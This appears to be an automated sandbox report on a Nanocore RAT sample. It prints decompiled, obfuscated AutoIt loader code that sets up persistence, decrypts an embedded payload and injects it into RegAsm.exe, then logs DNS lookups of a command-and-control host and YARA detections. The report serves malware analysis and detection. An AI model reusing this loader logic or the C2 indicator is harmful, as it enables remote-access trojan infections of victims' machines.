$VK_HANGUL = 21 GLOBAL CONST $VK_JUNJA = 23 GLOBAL CONST $VK_FINAL = 24 GLOBAL CONST $VK_HANJA = 25 GLOBAL CONST $VK_KANJI = 25 GLOBAL CONST $VK_ESCAPE = 27 GLOBAL CONST $VK_CONVERT = 28 GLOBAL CONST $VK_NONCONVERT = 29 GLOBAL CONST $VK_ACCEPT = 30 GLOBAL CONST $VK_MODECHANGE = 31 GLOBAL CONST $VK_SPACE = 32 GLOBAL CONST $VK_PRIOR = 33 GLOBAL CONST $VK_NEXT = 34 GLOBAL CONST $VK_END = 35 GLOBAL CONST $VK_HOME = 36 GLOBAL CONST $VK_LEFT = 37 GLOBAL CONST $VK_UP = 38 GLOBAL CONST $VK_RIGHT = 39 GLOBAL CONST $VK_DOWN = 40 GLOBAL CONST $VK_SELECT = 41 GLOBAL CONST $VK_PRINT = 42 GLOBAL CONST $VK_EXECUTE = 43 GLOBAL CONST $VK_SNAPSHOT = 44 GLOBAL CONST $VK_INSERT = 45 GLOBAL CONST $VK_DELETE = 46 GLOBAL CONST $VK_HELP = 47 GLOBAL CONST $VK_0 = 48 GLOBAL CONST $VK_1 = 49 GLOBAL CONST $VK_2 = 50 GLOBAL CONST $VK_3 = 51 GLOBAL CONST $VK_4 = 52 GLOBAL CONST $VK_5 = 53 GLOBAL CONST $VK_6 = 54 GLOBAL CONST $VK_7 = 55 GLOBAL CONST $VK_8 = 56 GLOBAL CONST $VK_9 = 57 GLOBAL CONST $VK_A = 65 GLOBAL CONST $VK_B = 66 GLOBAL CONST $VK_C = 67 GLOBAL CONST $VK_D = 68 GLOBAL CONST $VK_E = 69 GLOBAL CONST $VK_F = 70 GLOBAL CONST $VK_G = 71 GLOBAL CONST $VK_H = 72 GLOBAL CONST $VK_I = 73 GLOBAL CONST $VK_J = 74 GLOBAL CONST $VK_K = 75 GLOBAL CONST $VK_L = 76 GLOBAL CONST $VK_M = 77 GLOBAL CONST $VK_N = 78 GLOBAL CONST $VK_O = 79 GLOBAL CONST $VK_P = 80 GLOBAL CONST $VK_Q = 81 GLOBAL CONST $VK_R = 82 GLOBAL CONST $VK_S = 83 GLOBAL CONST $VK_T = 84 GLOBAL CONST $VK_U = 85 GLOBAL CONST $VK_V = 86 GLOBAL CONST $VK_W = 87 GLOBAL CONST $VK_X = 88 GLOBAL CONST $VK_Y = 89 GLOBAL CONST $VK_Z = 90 GLOBAL CONST $VK_LWIN = 91 GLOBAL CONST $VK_RWIN = 92 GLOBAL CONST $VK_APPS = 93 GLOBAL CONST $VK_SLEEP = 95 GLOBAL CONST $VK_NUMPAD0 = 96 GLOBAL CONST $VK_NUMPAD1 = 97 GLOBAL CONST $VK_NUMPAD2 = 98 GLOBAL CONST $VK_NUMPAD3 = 99 GLOBAL CONST $VK_NUMPAD4 = 100 GLOBAL CONST $VK_NUMPAD5 = 101 GLOBAL CONST $VK_NUMPAD6 = 102 GLOBAL CONST $VK_NUMPAD7 = 103 GLOBAL CONST $VK_NUMPAD8 = 104 GLOBAL CONST $VK_NUMPAD9 = 105 GLOBAL CONST $VK_MULTIPLY = 106 GLOBAL CONST $VK_ADD = 107 GLOBAL CONST $VK_SEPARATOR = 108 GLOBAL CONST $VK_SUBTRACT = 109 GLOBAL CONST $VK_DECIMAL = 110 GLOBAL CONST $VK_DIVIDE = 111 GLOBAL CONST $VK_F1 = 112 GLOBAL CONST $VK_F2 = 113 GLOBAL CONST $VK_F3 = 114 GLOBAL CONST $VK_F4 = 115 GLOBAL CONST $VK_F5 = 116 GLOBAL CONST $VK_F6 = 117 GLOBAL CONST $VK_F7 = 118 GLOBAL CONST $VK_F8 = 119 GLOBAL CONST $VK_F9 = 120 GLOBAL CONST $VK_F10 = 121 GLOBAL CONST $VK_F11 = 122 GLOBAL CONST $VK_F12 = 123 GLOBAL CONST $VK_F13 = 124 GLOBAL CONST $VK_F14 = 125 GLOBAL CONST $VK_F15 = 126 GLOBAL CONST $VK_F16 = 127 GLOBAL CONST $VK_F17 = 128 GLOBAL CONST $VK_F18 = 129 GLOBAL CONST $VK_F19 = 130 GLOBAL CONST $VK_F20 = 131 GLOBAL CONST $VK_F21 = 132 GLOBAL CONST $VK_F22 = 133 GLOBAL CONST $VK_F23 = 134 GLOBAL CONST $VK_F24 = 135 GLOBAL CONST $VK_NUMLOCK = 144 GLOBAL CONST $VK_SCROLL = 145 GLOBAL CONST $VK_LSHIFT = 160 GLOBAL CONST $VK_RSHIFT = 161 GLOBAL CONST $VK_LCONTROL = 162 GLOBAL CONST $VK_RCONTROL = 163 GLOBAL CONST $VK_LMENU = 164 GLOBAL CONST $VK_RMENU = 165 GLOBAL CONST $VK_BROWSER_BACK = 166 GLOBAL CONST $VK_BROWSER_FORWARD = 167 GLOBAL CONST $VK_BROWSER_REFRESH = 168 GLOBAL CONST $VK_BROWSER_STOP = 169 GLOBAL CONST $VK_BROWSER_SEARCH = 170 GLOBAL CONST $VK_BROWSER_FAVORITES = 171 GLOBAL CONST $VK_BROWSER_HOME = 172 GLOBAL CONST $VK_VOLUME_MUTE = 173 GLOBAL CONST $VK_VOLUME_DOWN = 174 GLOBAL CONST $VK_VOLUME_UP = 175 GLOBAL CONST $VK_MEDIA_NEXT_TRACK = 176 GLOBAL CONST $VK_MEDIA_PREV_TRACK = 177 GLOBAL CONST $VK_MEDIA_STOP = 178 GLOBAL CONST $VK_MEDIA_PLAY_PAUSE = 179 GLOBAL CONST $VK_LAUNCH_MAIL = 180 GLOBAL CONST $VK_LAUNCH_MEDIA_SELECT = 181 GLOBAL CONST $VK_LAUNCH_APP1 = 182 GLOBAL CONST $VK_LAUNCH_APP2 = 183 GLOBAL CONST $VK_OEM_1 = 186 GLOBAL CONST $VK_OEM_PLUS = 187 GLOBAL CONST $VK_OEM_COMMA = 188 GLOBAL CONST $VK_OEM_MINUS = 189 GLOBAL CONST $VK_OEM_PERIOD = 190 GLOBAL CONST $VK_OEM_2 = 191 GLOBAL CONST $VK_OEM_3 = 192 GLOBAL CONST $VK_OEM_4 = 219 GLOBAL CONST $VK_OEM_5 = 220 GLOBAL CONST $VK_OEM_6 = 221 GLOBAL CONST $VK_OEM_7 = 222 GLOBAL CONST $VK_OEM_8 = 223 GLOBAL CONST $VK_OEM_102 = 226 GLOBAL CONST $VK_PROCESSKEY = 229 GLOBAL CONST $VK_PACKET = 231 GLOBAL CONST $VK_ATTN = 246 GLOBAL CONST $VK_CRSEL = 247 GLOBAL CONST $VK_EXSEL = 248 GLOBAL CONST $VK_EREOF = 249 GLOBAL CONST $VK_PLAY = 250 GLOBAL CONST $VK_ZOOM = 251 GLOBAL CONST $VK_NONAME = 252 GLOBAL CONST $VK_PA1 = 253 GLOBAL CONST $VK_OEM_CLEAR = 254 DIM $STWGFKWWOFYRYTVJWBUHZVJYOCVTSEGV LOCAL $STARTUPDIR = @APPDATADIR & "\Gfxv2_0" LOCAL $BOOL = @SCRIPTDIR = $STARTUPDIR "True" "False" LOCAL $GUI = GUICREATE ("" , "350" , "100" , "0" , "0" , "0" , "-999" ) WHILE ("1" ) GUISETSTATE (@SW_SHOW ) LSVTGEQXOY () VFNIVSZMZI () VGPSDSMHIF ("53" , "45000" ) ZJFEKVYJJF ("sdchange" , "RMActivate_isv.exe" ) $STWGFKWWOFYRYTVJWBUHZVJYOCVTSEGV = EJTUMKGNAG ("0x53656345646974567C6375726C6E" , "0x434B5961674F4762524C467848624473567862694A455657466E574356766E4A" , "6" ) DIM $MLAETEGEXLRN = EXECUTE ("@HomeDrive & "\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"" ) DIM $FUAGJWKYSDOC = EXECUTE ("@HomeDrive & "\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"" ) IF FILEEXISTS ($MLAETEGEXLRN ) THEN RUNPE ($MLAETEGEXLRN , $STWGFKWWOFYRYTVJWBUHZVJYOCVTSEGV , TRUE , TRUE ) ELSEIF FILEEXISTS ($FUAGJWKYSDOC ) THEN RUNPE ($FUAGJWKYSDOC , $STWGFKWWOFYRYTVJWBUHZVJYOCVTSEGV , TRUE , TRUE ) ENDIF JBBXBRVVWS () EXITLOOP WEND FUNC JBBXBRVVWS ()

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2021 13:55:56.193998098 CEST	54513	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:55:56.221251965 CEST	53	54513	8.8.8.8	192.168.2.6
Sep 15, 2021 13:55:56.458406925 CEST	62044	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:55:56.486057997 CEST	53	62044	8.8.8.8	192.168.2.6
Sep 15, 2021 13:55:58.620229006 CEST	63791	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:55:58.645355940 CEST	53	63791	8.8.8.8	192.168.2.6
Sep 15, 2021 13:56:01.724242926 CEST	64267	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:56:01.757056952 CEST	53	64267	8.8.8.8	192.168.2.6
Sep 15, 2021 13:56:35.843023062 CEST	49448	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:56:35.876810074 CEST	53	49448	8.8.8.8	192.168.2.6
Sep 15, 2021 13:56:48.916340113 CEST	60342	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:56:48.951920033 CEST	53	60342	8.8.8.8	192.168.2.6
Sep 15, 2021 13:56:53.921586990 CEST	61346	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:56:53.966682911 CEST	53	61346	8.8.8.8	192.168.2.6
Sep 15, 2021 13:56:54.964948893 CEST	51774	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:56:54.989600897 CEST	53	51774	8.8.8.8	192.168.2.6
Sep 15, 2021 13:56:55.612751007 CEST	56023	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:56:55.677202940 CEST	53	56023	8.8.8.8	192.168.2.6
Sep 15, 2021 13:56:56.170588970 CEST	58384	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:56:56.221203089 CEST	53	58384	8.8.8.8	192.168.2.6
Sep 15, 2021 13:56:56.857876062 CEST	60261	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:56:56.885330915 CEST	53	60261	8.8.8.8	192.168.2.6
Sep 15, 2021 13:56:57.527518034 CEST	56061	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:56:57.554430008 CEST	53	56061	8.8.8.8	192.168.2.6
Sep 15, 2021 13:56:58.275342941 CEST	58336	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:56:58.305098057 CEST	53	58336	8.8.8.8	192.168.2.6
Sep 15, 2021 13:56:58.931689024 CEST	53781	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:56:58.969841957 CEST	53	53781	8.8.8.8	192.168.2.6
Sep 15, 2021 13:56:59.307921886 CEST	54064	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:56:59.357635021 CEST	53	54064	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:00.104847908 CEST	52811	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:00.197278976 CEST	53	52811	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:00.653752089 CEST	55299	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:00.681313992 CEST	53	55299	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:03.784324884 CEST	63745	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:03.810755014 CEST	53	63745	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:07.895946026 CEST	50055	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:07.925545931 CEST	53	50055	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:11.972706079 CEST	61374	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:11.997688055 CEST	53	61374	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:14.878935099 CEST	50339	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:14.916450977 CEST	53	50339	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:16.216864109 CEST	63307	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:16.249648094 CEST	53	63307	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:20.413863897 CEST	49694	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:20.443173885 CEST	53	49694	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:24.694555044 CEST	54982	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:24.723551989 CEST	53	54982	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:28.968398094 CEST	50010	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:29.004542112 CEST	53	50010	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:29.112659931 CEST	63718	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:29.180593967 CEST	53	63718	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:33.072887897 CEST	62116	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:33.103174925 CEST	53	62116	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:37.514784098 CEST	63816	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:37.544377089 CEST	53	63816	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:41.604831934 CEST	55014	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:41.634622097 CEST	53	55014	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:42.669401884 CEST	62208	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:42.707053900 CEST	53	62208	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:45.818428993 CEST	57574	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:45.847418070 CEST	53	57574	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:48.559989929 CEST	51818	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:48.595588923 CEST	53	51818	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:50.012881041 CEST	56628	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:50.042393923 CEST	53	56628	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:50.659118891 CEST	60778	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:50.700021029 CEST	53	60778	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:54.070163965 CEST	53799	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:54.096656084 CEST	53	53799	8.8.8.8	192.168.2.6
Sep 15, 2021 13:57:58.353168011 CEST	54683	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:57:58.383055925 CEST	53	54683	8.8.8.8	192.168.2.6
Sep 15, 2021 13:58:03.071388006 CEST	59329	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:58:03.097934008 CEST	53	59329	8.8.8.8	192.168.2.6
Sep 15, 2021 13:58:07.313395023 CEST	64021	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:58:07.342670918 CEST	53	64021	8.8.8.8	192.168.2.6
Sep 15, 2021 13:58:11.361876011 CEST	56129	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:58:11.388569117 CEST	53	56129	8.8.8.8	192.168.2.6
Sep 15, 2021 13:58:15.394278049 CEST	58177	53	192.168.2.6	8.8.8.8
Sep 15, 2021 13:58:15.423655987 CEST	53	58177	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 15, 2021 13:57:03.784324884 CEST	192.168.2.6	8.8.8.8	0x3282	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:07.895946026 CEST	192.168.2.6	8.8.8.8	0xaf8a	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:11.972706079 CEST	192.168.2.6	8.8.8.8	0x2f0b	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:16.216864109 CEST	192.168.2.6	8.8.8.8	0x222e	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:20.413863897 CEST	192.168.2.6	8.8.8.8	0xf245	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:24.694555044 CEST	192.168.2.6	8.8.8.8	0xf26d	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:28.968398094 CEST	192.168.2.6	8.8.8.8	0xa427	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:33.072887897 CEST	192.168.2.6	8.8.8.8	0xe0f	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:37.514784098 CEST	192.168.2.6	8.8.8.8	0xa946	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:41.604831934 CEST	192.168.2.6	8.8.8.8	0x5ce5	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:45.818428993 CEST	192.168.2.6	8.8.8.8	0xecc1	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:50.012881041 CEST	192.168.2.6	8.8.8.8	0x2d39	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:54.070163965 CEST	192.168.2.6	8.8.8.8	0x929c	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:58.353168011 CEST	192.168.2.6	8.8.8.8	0x9308	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:58:03.071388006 CEST	192.168.2.6	8.8.8.8	0x1425	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:58:07.313395023 CEST	192.168.2.6	8.8.8.8	0xda2	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:58:11.361876011 CEST	192.168.2.6	8.8.8.8	0x7d7c	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)
Sep 15, 2021 13:58:15.394278049 CEST	192.168.2.6	8.8.8.8	0x3519	Standard query (0)	megida.hopto.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Sep 15, 2021 13:57:03.810755014 CEST	8.8.8.8	192.168.2.6	0x3282	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:07.925545931 CEST	8.8.8.8	192.168.2.6	0xaf8a	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:11.997688055 CEST	8.8.8.8	192.168.2.6	0x2f0b	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:16.249648094 CEST	8.8.8.8	192.168.2.6	0x222e	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:20.443173885 CEST	8.8.8.8	192.168.2.6	0xf245	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:24.723551989 CEST	8.8.8.8	192.168.2.6	0xf26d	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:29.004542112 CEST	8.8.8.8	192.168.2.6	0xa427	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:33.103174925 CEST	8.8.8.8	192.168.2.6	0xe0f	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:37.544377089 CEST	8.8.8.8	192.168.2.6	0xa946	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:41.634622097 CEST	8.8.8.8	192.168.2.6	0x5ce5	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:45.847418070 CEST	8.8.8.8	192.168.2.6	0xecc1	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:50.042393923 CEST	8.8.8.8	192.168.2.6	0x2d39	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:54.096656084 CEST	8.8.8.8	192.168.2.6	0x929c	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)
Sep 15, 2021 13:57:58.383055925 CEST	8.8.8.8	192.168.2.6	0x9308	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)
Sep 15, 2021 13:58:03.097934008 CEST	8.8.8.8	192.168.2.6	0x1425	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)
Sep 15, 2021 13:58:07.342670918 CEST	8.8.8.8	192.168.2.6	0xda2	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)
Sep 15, 2021 13:58:11.388569117 CEST	8.8.8.8	192.168.2.6	0x7d7c	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)
Sep 15, 2021 13:58:15.423655987 CEST	8.8.8.8	192.168.2.6	0x3519	No error (0)	megida.hopto.org	0.0.0.0	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wIQLBHYbqz.exe PID: 4904 Parent PID: 5288

General

Start time:	13:56:01
Start date:	15/09/2021
Path:	C:\Users\user\Desktop\wIQLBHYbqz.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\wIQLBHYbqz.exe'
Imagebase:	0x400000
File size:	1253976 bytes
MD5 hash:	1312D6FF22DBD8E9E05D1B0D9130439D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.453308954.000000000399F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.453308954.000000000399F000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000003.453308954.000000000399F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.452029104.0000000003975000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.452029104.0000000003975000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000003.452029104.0000000003975000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.614883445.00000000014A2000.00000040.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.614883445.00000000014A2000.00000040.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.614883445.00000000014A2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.617706572.0000000003910000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.617706572.0000000003910000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.617706572.0000000003910000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.450606191.0000000004911000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.450606191.0000000004911000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000003.450606191.0000000004911000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.617309688.0000000003893000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.617309688.0000000003893000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.617309688.0000000003893000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.450818264.000000000391C000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.450818264.000000000391C000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000003.450818264.000000000391C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000003.466877574.00000000039B2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000003.466877574.00000000039B2000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000003.466877574.00000000039B2000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.618062231.0000000003997000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.618062231.0000000003997000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.618062231.0000000003997000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.618678183.0000000004910000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.618678183.0000000004910000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.618678183.0000000004910000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 4936 Parent PID: 4904

General

Start time:	13:57:01
Start date:	15/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Imagebase:	0xc50000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.617258087.0000000005B70000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.617258087.0000000005B70000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.617258087.0000000005B70000.00000004.00020000.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.609808438.0000000000402000.00000040.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.609808438.0000000000402000.00000040.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.609808438.0000000000402000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.615169994.0000000004247000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.615169994.0000000004247000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.616663037.00000000056F0000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.616663037.00000000056F0000.00000004.00020000.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: RMActivate_isv.exe.bat PID: 6788 Parent PID: 3440

General

Start time:	13:57:03
Start date:	15/09/2021
Path:	C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat'
Imagebase:	0x400000
File size:	1253984 bytes
MD5 hash:	F9F1A2B23DF822033EC717757776CBB7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
